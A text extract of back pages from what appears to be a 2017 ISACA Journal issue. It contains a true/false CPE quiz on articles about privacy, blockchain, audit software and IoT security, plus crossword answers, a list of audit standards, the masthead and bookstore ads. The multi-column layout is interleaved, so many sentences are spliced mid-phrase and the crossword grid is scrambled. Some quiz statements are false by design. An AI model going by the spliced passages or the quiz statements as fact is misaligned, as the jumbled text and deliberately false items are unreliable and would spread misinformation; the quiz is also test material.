1. Despite its explicit support of privacy 10. Research indicates that barriers to a system’s
and data protection by design as a legal use dissuade users, but when those barriers
obligation, the EU General Data Protection disappear, their absence encourages use.
Regulation (GDPR) is not among the most
commonly used frameworks for managing 11. According to the research presented in the
privacy, according to ISACA’s 2014 Privacy article, financial auditors find generalized
Survey. audit software (GAS) much easier to use than
do other auditors.
2. Human biases and national sensitivities
have an impact on the definition of private 12. Two factors that encourage the use of
information and associated privacy GAS are perceived ease of use and perceived
expectations. usefulness.
3. When organizations are creating products 13. The authors’ research indicates that internal
and solutions and are faced with prioritizing auditors perceive less threat from using GAS
privacy protection against business than do external auditors.
objectives (such as speed to market), they
will generally place a higher priority on WERNEBURG ARTICLE
business objectives.
14. T
he impact that data breaches have on the
individuals whose personal information is
CARON ARTICLE compromised is considered a secondary risk
4. Immutability, or a single version of the truth, factor, rather than a proximate risk factor.
is a benefit to blockchain technology because 15. Regulatory requirements and service audit
it contributes to reducing the asymmetry systems such as Service Organization
between the networked entities engaged in a Control (SOC) 2 specify that an application
transaction. vulnerability scan should be performed at
5. S
torage of the cryptographic keys that are least annually and the report shared with the
used as digital signatures constitutes a client.
security weakness for blockchain. 16. Budget, differing priorities and conflicting
6. In the United States, blockchain solutions that objectives are just a few reasons a client may
are used for sharing and recording patient not want to deal with security fixes.
records are not subject to the US Health
Insurance Portability and Accountability Act MUKUNDHAN ARTICLE
(HIPAA).
17. According to PricewaterhouseCoopers
(PwC), between 30 and 50 billion devices
KELLY ARTICLE will be connected to the Internet by the
7. Executive buy-in is critical to an year 2020.
enterprisewide security program, and 18. When a client requests a connection to the
one way to appeal to executives is by server via a SYN message and the server
communicating the program’s benefits in responds with ACK, that is a Transmission
terms of their specific pain points. Control Protocol (TCP) three-way handshake.
8. Although it is important to raise security 19. The 2016 coordinated distributed denial-
awareness among employees, it is not of-service (DDoS) attack on DYN was
as important as focusing on external initiated by the Mirai botnet—a cluster of
malicious actors, because less than half approximately 100,000 enslaved Internet of
of cyberattacks are carried out by insiders, Things (IoT) devices delivering different types
according to the IBM X-Force 2016 Cyber of DDoS attacks.
Security Intelligence Index.
20. IoT devices are widely known to take a
9. A
n acceptable-use policy should clearly strong stance on security, which they
define who owns mobile devices and what demonstrate through such regular practices
access the enterprise has to the data on as unguessable passwords, secured ports
those devices. and regularly updated firmware.
TRUE OR FALSE
SATHIYAMURTHY ARTICLE BRADFORD AND HENDERSON
ARTICLE
Name
1. 10. PLEASE PRINT OR TYPE
2. 11.
3. 12.
Address
CARON ARTICLE 13.
4.
WERNEBURG ARTICLE
5. CISA, CRISC, CISM or CGEIT #
14.
6.
15.
KELLY ARTICLE 16. Answers: Crossword by Myles Mellor
See page 56 for the puzzle.
7.
MUKUNDHAN ARTICLE 1 2 3 4 5 6 7
C O L O C A T I O N F T P
8. U E O I U L O
17. 8
S L A
9
N E T
10
T H
11
R E A T S
9. T
12
S A S
13
A B A E T E
18. 14
O N E
15
O W N
16
G
17
A R B L E D
18 19
D M L D E C O I
19. Y
20
B E E
21
F
22
R U I N
23
E
24
D
25 26 27
R A M O M E T E V A
20. 28
R E C O
29
V
30
E R Y
31
S E T
32
I T
33 34 35
E K I R E C A T A
Please confirm with other designation-granting professional bodies for their CPE qualification acceptance criteria. 36 37 38 39
C P U R A N S O M W A R E
Quizzes may be submitted for grading only by current Journal subscribers. An electronic version of the quiz is 40 41
available at www.isaca.org/cpequiz; it is graded online and is available to all interested parties. If choosing to submit E P U T S N O R G
using this print copy, please email, fax or mail your answers for grading. Return your answers and contact information 42
D O S
43
U N I
44
C O R R U P
45
T
by email to info@isaca.org or by fax to +1.847.253.1755. If you prefer to mail your quiz, in the US, send your CPE Quiz
along with a stamped, self-addressed envelope, to ISACA International Headquarters, 3701 Algonquin Rd., #1010, E A C U M E E
46 47
Rolling Meadows, IL 60008 USA. Outside the US, ISACA will pay the postage to return your graded quiz. You need only D I S C L O S U R E I D E A
to include an envelope with your address. You will be responsible for submitting your credit hours at year-end for CPE
credits. A passing score of 75 percent will earn one hour of CISA, CRISC, CISM or CGEIT CPE credit.
Get Noticed!
Advertise in the ISACA® Journal
Journal
For more information, contact media@isaca.org
ISACA Member and Certification Holder Compliance IS Audit and Assurance Guidelines
he guidelines are designed to directly support the standards and help
T
The specialized nature of information systems (IS) audit and assurance and practitioners achieve alignment with the standards. They follow the same
the skills necessary to perform such engagements require standards that apply categorization as the standards (also divided into three categories):
specifically to IS audit and assurance. The development and dissemination of the • General guidelines (2000 series)
IS audit and assurance standards are a cornerstone of the ISACA® professional
contribution to the audit community. • Performance guidelines (2200 series)
IS audit and assurance standards define mandatory requirements for IS auditing. • Reporting guidelines (2400 series)
They report and inform:
• IS audit and assurance professionals of the minimum level of acceptable
General
2001 Audit Charter
performance required to meet the professional responsibilities set out in the
2002 Organizational Independence
ISACA Code of Professional Ethics
2003 Professional Independence
• Management and other interested parties of the profession’s expectations 2004 Reasonable Expectation
concerning the work of practitioners 2005 Due Professional Care
2006 Proficiency
• Holders of the Certified Information Systems Auditor® (CISA®) designation 2007 Assertions
of requirements. Failure to comply with these standards may result in an 2008 Criteria
investigation into the CISA holder’s conduct by the ISACA Board of Directors or
appropriate committee and, ultimately, in disciplinary action.
Performance
2201 Engagement Planning
ITAF , 3 Edition
TM rd
2202 Risk Assessment in Planning
(www.isaca.org/itaf) provides a framework for multiple levels of guidance: 2203 Performance and Supervision
2204 Materiality
IS Audit and Assurance Standards 2205 Evidence
2206 Using the Work of Other Experts
The standards are divided into three categories: 2207 Irregularity and Illegal Acts
2208 Sampling
• General standards (1000 series)—Are the guiding principles under which the IS
assurance profession operates. They apply to the conduct of all assignments
and deal with the IS audit and assurance professional’s ethics, independence, Reporting
objectivity and due care as well as knowledge, competency and skill. 2401 Reporting
2402 Follow-up Activities
• Performance standards (1200 series)—Deal with the conduct of the assignment,
such as planning and supervision, scoping, risk and materiality, resource
mobilization, supervision and assignment management, audit and assurance IS Audit and Assurance Tools and Techniques
evidence, and the exercising of professional judgment and due care. These documents provide additional guidance for IS audit and assurance
• Reporting standards (1400 series)—Address the types of reports, means of professionals and consist, among other things, of white papers, IS audit/assurance
communication and the information communicated. programs, reference books and the COBIT® 5 family of products. Tools and
techniques are listed under www.isaca.org/itaf.
Please note that the guidelines are effective 1 September 2014.
An online glossary of terms used in ITAF is provided at www.isaca.org/glossary.
General
1001 Audit Charter
Prior to issuing any new standard or guideline, an exposure draft is
1002 Organizational Independence
issued internationally for general public comment.
1003 Professional Independence
1004 Reasonable Expectation Comments may also be submitted to the attention of the Director,
1005 Due Professional Care Thought Leadership and Research via email (standards@isaca.org);
1006 Proficiency fax (+1.847.253.1755) or postal mail (ISACA International Headquarters,
1007 Assertions 3701 Algonquin Road, Suite 1010, Rolling Meadows, IL 60008-3105, USA).
1008 Criteria
Links to current and exposed ISACA Standards, Guidelines, and Tools
Performance and Techniques are posted at www.isaca.org/standards.
1201 Engagement Planning
1202 Risk Assessment in Planning Disclaimer: ISACA has designed this guidance as the minimum
level of acceptable performance required to meet the professional
1203 Performance and Supervision
responsibilities set out in the ISACA Code of Professional Ethics. ISACA
1204 Materiality
makes no claim that use of these products will assure a successful
1205 Evidence outcome. The guidance should not be considered inclusive of any
1206 Using the Work of Other Experts proper procedures and tests or exclusive of other procedures and
1207 Irregularity and Illegal Acts tests that are reasonably directed to obtaining the same results. In
determining the propriety of any specific procedure or test, the control
Reporting professionals should apply their own professional judgment to the
1401 Reporting specific control circumstances presented by the particular systems or
1402 Follow-up Activities IS environment.
supporters
leaders and
advertisers. They may differ
from policies and official
statements of ISACA and/or
the IT Governance Institute
and their committees, and
from opinions endorsed by
authors, employers or the
editors of the Journal. ISACA
Journal does not attest to the Editor Manish Gupta, Ph.D., CISA, CRISC, Ilija Vadjon, CISA
originality of authors’ content. CISM, CISSP Sadir Vanderloot Sr., CISA, CISM, CCNA,
Jennifer Hajigeorgiou Mike Hansen, CISA, CFE CCSA, NCSA
publication@isaca.org Jeffrey Hare, CISA, CPA, CIA Varun Vohra, CISA, CISM
© 2017 ISACA. All rights
Sherry G. Holland Manoj Wadhwa, CISA, CISM, CISSP,
reserved. Managing Editor Jocelyn Howard, CISA, CISMP, CISSP ISO 27000, SABSA
Maurita Jasper Francisco Igual, CISA, CGEIT, CISSP Anthony Wallis, CISA, CRISC, CBCP, CIA
Instructors are permitted to Jennifer Inserro, CISA, CISSP Kevin Wegryn, PMP, Security+, PfMP
photocopy isolated articles for Khawaja Faisal Javed, CISA, CRISC, CBCP, Tashi Williamson
noncommercial classroom use
Assistant Editor ISMS LA Ellis Wong, CISA, CRISC, CFE, CISSP
without fee. For other copying, Safia Kazi Mohammed J. Khan, CISA, CRISC, CIPM
reprint or republication, Farzan Kolini, GIAC ISACA Board of Directors
permission must be obtained Contributing Editors Abbas Kudrati, CISA, CISM, CGEIT, CEH, CHFI, (2017-2018)
EDRP, ISMS
in writing from the association. Sunil Bakshi, CISA, CRISC, CISM, CGEIT, ABCI, Chair
Shruti Kulkarni, CISA, CRISC, CCSK, ITIL
Where necessary, permission AMIIB, BS 25999 LI, CEH, CISSP, ISO Bhanu Kumar Theresa Grafenstine, CISA, CRISC, CGEIT,
is granted by the copyright 27001 LA, MCA, PMP Hiu Sing (Vincent) Lam, CISA, CPIT(BA), CGAP, CGMA, CIA, CPA
owners for those registered Ian Cooke, CISA, CRISC, CGEIT, COBIT ITIL, PMP Vice-chair
with the Copyright Clearance Foundation, CFE, CPTS, DipFM, ITIL Edward A. Lane, CISA, CCP, PMP Rob Clyde, CISM
Center (CCC) (www.copyright. Foundation, Six Sigma Green Belt Romulo Lomparte, CISA, CRISC, CISM, CGEIT,
Ed Moyle COBIT 5 Foundation, CRMA, IATCA, IRCA, Director
com), 27 Congress St., Salem, Brennan Baybeck, CISA, CRISC,
Vasant Raval, DBA, CISA ISO 27002, PMP
MA 01970, to photocopy Steven J. Ross, CISA, CBCP, CISSP CISM, CISSP
articles owned by ISACA,
Larry Marks, CISA, CRISC, CGEIT
Tamer Marzouk, CISA, ABCP, CBAP Director
for a flat fee of US $2.50 per Advertising Zubin Chagpar, CISA, CISM, PMP
Krysten McCabe, CISA
article plus 25¢ per page. Brian McLaughlin, CISA, CRISC, CISM,
Send payment to the CCC media@isaca.org Director
CIA, CISSP, CPA Peter Christiaans, CISA, CRISC, CISM, PMP
stating the ISSN (1944-1967), Brian McSweeney
date, volume, and first and Media Relations Irina Medvinskaya, CISM, FINRA, Series 99 Director
last page number of each news@isaca.org David Earl Mills, CISA, CRISC, CGEIT, MCSE Hironori Goto, CISA, CRISC, CISM, CGEIT
article. Copying for other Robert Moeller, CISA, CISSP, CPA, CSQE Director
than personal use or internal Reviewers David Moffatt, CISA, PCI-P Michael Hughes, CISA, CRISC, CGEIT
reference, or of articles or
Ramu Muthiah, CISM, CRVPM, GSLC,
Matt Altman, CISA, CRISC, CISM, CGEIT Director
ITIL, PMP
columns not owned by the Sanjiv Agarwala, CISA, CISM, CGEIT, CISSP, Leonard Ong, CISA, CRISC, CISM,
Ezekiel Demetrio J. Navarro, CPA
association without express ITIL, MBCI CGEIT, CFE, CIPM, CIPT, CPP, CISSP
Jonathan Neel, CISA
permission of the association Vikrant Arora, CISM, CISSP ISSMP-ISSAP, CITBCM, CSSLP, GCFA,
Nnamdi Nwosu, CISA, CRISC, CISM, CGEIT,
or the copyright owner is Cheolin Bae, CISA, CCIE GCIA, GCIH, GSNA, PMP
PfMP, PMP
expressly prohibited. Sunil Bakshi, CISA, CRISC, CISM, CGEIT, ABCI, Anas Olateju Oyewole, CISA, CRISC, CISM, Director
AMIIB, BS 25999 LI, CEH, CISSP, ISO CISSP, CSOE, ITIL R. V. Raghu, CISA, CRISC
ISSN 1944-1967
27001 LA, MCA, PMP David Paula, CISA, CRISC, CISSP, PMP Director
Brian Barnier, CRISC, CGEIT Pak Lok Poon, Ph.D., CISA, CSQA, MIEEE Jo Stewart-Rattray, CISA, CRISC,
Pascal A. Bizarro, CISA John Pouey, CISA, CRISC, CISM, CIA CISM, CGEIT
Jerome Capirossi, CISA Steve Primost, CISM
Anand Choksi, CISA, CCSK, CISSP, PMP Parvathi Ramesh, CISA, CA Director
Joyce Chua, CISA, CISM, PMP, ITILv3 Antonio Ramos Garcia, CISA, CRISC, CISM, Ted Wolff, CISA
Ashwin K. Chaudary, CISA, CRISC, CISM, CDPP, ITIL Director
CGEIT Michael Ratemo, CISA, CRISC, CISM, CSXF, Tichaona Zororo, CISA, CRISC, CISM, CGEIT,
Burhan Cimen, CISA, COBIT Foundation, ACDA, CIA, CISSP, CRMA COOBIT Assessor and Trainer, CIA,
ISO 27001 LA, ITIL, PRINCE2 Sheri L. Rawlings, CGEIT CRMA
Ken Doughty, CISA, CRISC, CBCP Ron Roy, CISA, CRP
Nikesh L. Dubey, CISA, CRISC, Director and Chief Executive Officer
Louisa Saunier, CISSP, PMP, Six Sigma
Subscription Rates: CISM, CISSP Matthew S. Loeb, CGEIT, CAE, FASAE
Green Belt
Ross Dworman, CISM, GSLC Daniel Schindler, CISA, CIA Director and Past Chair
US: Robert Findlay Sandeep Sharma Christos Dimitriadis, Ph.D., CISA, CRISC,
one year (6 issues) $75.00 John Flowers, CISA, CRISC Catherine Stevens, ITIL CISM, ISO 20000 LA
Jack Freund, Ph.D., CISA, CRISC, CISM, Johannes Tekle, CISA, CFSA, CIA Director and Past Chair
All international orders: CIPP, CISSP, PMP Robert W. Theriot Jr., CISA, CRISC Robert E Stroud, CRISC, CGEIT
one year (6 issues) $90.00. Sailesh Gadia, CISA Nancy Thompson, CISA, CISM,
Amgad Gamal, CISA, COBIT Foundation, CEH, Director and Past Chair
CGEIT, PMP
CHFI, CISSP, ECSA, ISO 2000 LA/LP, ISO Tony Hayes, CGEIT, AFCHSE, CHE, FACS,
Remittance must be made Smita Totade, Ph.D., CISA, CRISC,
27000 LA, MCDBA, MCITP, MCP, MCSE, FCPA, FIIA
CISM, CGEIT
in US funds. MCT, PRINCE2 Jose Urbaez, CISA, CRISC, CISM, CGEIT,
Robin Generous, CISA, CPA CSXF, ITIL
Tushar Gokhale, CISA, CISM, CISSP,
ISO 27001 LA
Tanja Grivicic
ISACA BOOKSTORE
RESOURCES FOR YOUR
PROFESSIONAL DEVELOPMENT
www.isaca.org/bookstore
Browse a variety of publications featuring the latest research and expert thinking on standards,
best practices, emerging trends and more at isaca.org/bookstore S-1
Featured Exam Prep Materials
CISA® Review Manual, 26th Edition CISA® Review Questions, Answers & Explanations
The CISA® Review Manual, 26th Edition is a comprehensive Manual, 11th Edition
reference guide designed to help individuals prepare for the CISA Designed to familiarize candidates with the question types and
exam and understand the roles and responsibilities of an information topics featured in the CISA exam, the CISA® Review Questions,
systems (IS) auditor. The manual has been revised according to Answers & Explanations Manual, 11th Edition consists of 1,000
the 2016 CISA Job Practice and represents the most current, multiple-choice study questions that have previously appeared in
comprehensive, peer-reviewed IS audit, assurance, security and the CISA® Review Questions, Answers & Explanations Manual 2015
control resource available. and the CISA® Review Questions, Answers & Explanations Manual
2015 Supplement. The manual has been updated according to the
The 26th edition is organized to assist candidates in understanding
newly revised 2016 Job Practice.
essential concepts and studying the following job practice areas:
The Process of Auditing Information Systems; Governance and Many questions have been revised or completely rewritten
Management of IT; Information Systems Acquisition, Development to be more representative of the CISA exam question format and/or
and Implementation; Information Systems Operations, Maintenance to provide further clarity or explanation of the correct answer. These
and Service Management; Protection of Information Assets. questions are not actual exam items but are intended to provide
CISA candidates with an understanding of the type and structure of
The manual also serves as an effective
questions and content that have previously appeared on the exam.
desk reference for IS auditors.
This publication is ideal to use in conjunction with the:
•
CISA® Review Manual, 26th Edition
Member: US $105.00
Non-member: US $135.00 • CISA® Review Questions, Answers & Explanations
Print Product Code: CRM26ED Database – 12 Month Subscription
eBook Product Code: EPUB_CRM26ED
Member: US $120.00
Non-member: US $156.00
Product Code: QAE11ED
NEW!
CISM® Review Manual, 15th Edition
CRISC™ Review Questions, Answers & Explanations The CISM® Review Manual, 15th Edition is designed to help you
Manual, 5th Edition prepare for the CISM® exam. This comprehensive, easy-to-navigate
manual is organized into chapters that correspond to the four job
The CRISC™ Review Questions, Answers & Explanations Manual, practice areas covered in the CISM exam. The Manual is primarily
5th Edition has been expanded and updated to include even designed as a tool for exam prep, but can also be useful as a
more practice questions. This study aid is designed to familiarize reference manual for information security managers.
candidates with the question types and topics featured in the CRISC
exam with the use of 550 questions. New to the 15th Edition:
Many questions have been revised or completely rewritten to be • In Practice Questions help you explore the concepts in the
more representative of the current CRISC exam question format, CISM Review Manual in your own practice.
and/or to provide further clarity or explanation of the correct answer. • Knowledge Checks are designed to help reinforce important
These questions are not actual exam items, but are intended to concepts from the Review Manual to further enhance your
provide CRISC candidates with an understanding of the type and learning.
structure of questions and content that have previously appeared • Case Studies provide real-world scenarios to help you gain a
on the exam. practical perspective on the Review Manual content and how it
relates to the CISM’s practice.
Member: US $72.00 • Comprehensive Index has been updated to make navigating
CRISC Review Questions, Answers & Explanations Manual 5th Edition
Non-member: US $96.00
the Review Manual easier and more intuitive.
Product Code: CRQ5ED
CISM
3701 Algonquin Road | Suite 1010
Rolling Meadows, IL 60008 | USA
P: +1.847.253.1545
F: +1.847.253.1443
E: info@isaca.org
isaca.org
NEW!
The database is available via the web, allowing our CISM candidates to log in at home, at work or anywhere
they have Internet connectivity. The database is MAC and Windows compatible.
Exam candidates can take sample exams with randomly selected questions and view the results by job practice
domain, allowing for concentrated study in particular areas. Additionally, questions generated during a study
session are sorted based on previous scoring history, allowing CISM candidates to identify their strengths and
weaknesses and focus their study efforts accordingly.
Member: US $185.00
Non-member: US $225.00
Product Code: XMXCM15-12M
CGEIT® Review Manual, 7th Edition CGEIT® Review Questions, Answers & Explanations
The CGEIT® Review Manual, 7th Edition is designed to help Manual, 4th Edition
individuals prepare for the CGEIT exam and understandthe The CGEIT® Review Questions, Answers & Explanations
responsibilities of those who implement or manage the governance Manual, 4th Edition is designed to familiarize candidates with the
of enterprise IT (GEIT) or have significant advisory or assurance question types and topics featured in the CGEIT exam.
responsibilities in regards to GEIT. It is a detailed reference guide
that has been developed and reviewed by subject matter experts The 250 questions in this manual have been consolidated from
actively involved in governance of enterprise IT worldwide. the CGEIT® Review Questions, Answers & Explanations Manual,
2015 and the CGEIT® Review Questions, Answers & Explanations
The manual is organized to assist candidates in understanding
essential concepts and studying the following updated job Manual, 2015 Supplement.
practice areas:
Many questions have been revised or completely rewritten to be
• Framework for the governance of enterprise IT more representative of the CGEIT exam question format and/or to
• Strategic management provide further clarity or explanation of the correct answer. These
• Benefits realization questions are not actual exam items but are intended to provide
• Risk optimization CGEIT candidates with an understanding of the type and structure
of questions and content that has previously appeared on the
• Resource optimization
exam. This publication is ideal to use in conjunction with the:
TM
R-CAP leverages on the latest technology & offers:
u Mobility u Collaboration u Smart Editing